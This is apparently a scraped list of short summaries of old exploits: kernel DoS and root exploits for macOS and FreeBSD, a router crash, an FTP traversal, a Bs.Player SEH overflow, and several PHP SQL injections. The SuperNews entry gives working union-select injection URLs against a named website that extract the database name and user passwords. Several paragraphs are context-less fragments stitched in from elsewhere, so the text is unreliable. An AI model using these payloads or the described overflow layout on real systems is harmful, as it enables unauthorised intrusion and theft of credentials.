This exploit is a proof-of-concept for a local kernel memory leak/DoS vulnerability in Apple MACOS X xnu <= 1228.3.13. It opens the profil system call and fills up to 65536 * 128 bytes of kernel memory. This can lead to a denial of service or a potential information leak.
This exploit is a local kernel root exploit for FreeBSD versions 7.0 and 7.1. It uses a vulnerability in the ktimer_create() function to overwrite the itimer struct and execute the give_me_root() function, which grants the user root privileges.
After establishing a tcp connection to the affected device on port 53 from the LAN interface and after closing the connection the router will restart. Sometimes when using the web trigger with Internet explorer the WAN configuration (ip, gateway ip, dns servers) for the device was lost and a hardware reset was needed in order to make the device usable again. This issue can be triggered from the LAN interface by direct connection or by using specially crafted web content. For the web content to be able to trigger the issue a browser withouth security restrictions on connection to port 53 must be used, the tests done shows Internet Explorer like the only one cappable of activating the bug.
This exploit is related to the Errata Notice 09:01 from FreeBSD.org. It is a local exploit which causes a kernel panic by using the kenv() function with a large value for the third argument. This exploit was published on milw0rm.com in 2009.
X-BLC is a dynamic web content management system written in PHP. A SQL injection vulnerability exists in X-BLC <= 0.2.0 which allows an attacker to extract data from the database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'include/get_read.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This can allow the attacker to extract data from the database such as usernames and passwords.
In both cases IE security settings were default for Internet Zone. Exploitation tests ended successfully without any warnings or other interaction from Internet Explorer. For testing first create "test.txt" file to the C: root dir and then use IE and hit test button. "test.txt" should be deleted for now :)
A vulnerability is caused due to an input validation error when handling FTP "DELE" requests. This can be exploited to escape the FTP root and delete arbitrary files on the system via directory traversal attacks using the "..//" character sequence.
SuperNews 1.5 is vulnerable to SQL Injection in the 'valor.php' script. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. An example of the vulnerable URL is http://www.avhsj.com.br/noticias/valor.php?noticia=[SQL-Injection]. A live demo of the exploit can be found at http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5-- and http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--.
This exploit is used to exploit a blind SQL injection vulnerability in WBB3 rGallery. It uses a combination of a user ID and a User Gallery userID to exploit the vulnerability and extract the password and salt of the user.
This exploit is a universal SEH overwrite exploit for Bs.Player 2.34 (.bsl). It was written by Nine:Situations:Group::pyrokinesis and exploited by His0k4. It was tested on Windows XP Pro SP2 Fr. It uses a buffer of 412 A's followed by an EB 12 41 41, a D02658 02 SEH handler, 19 NOPs, and a 343 byte shellcode.
Services By CQR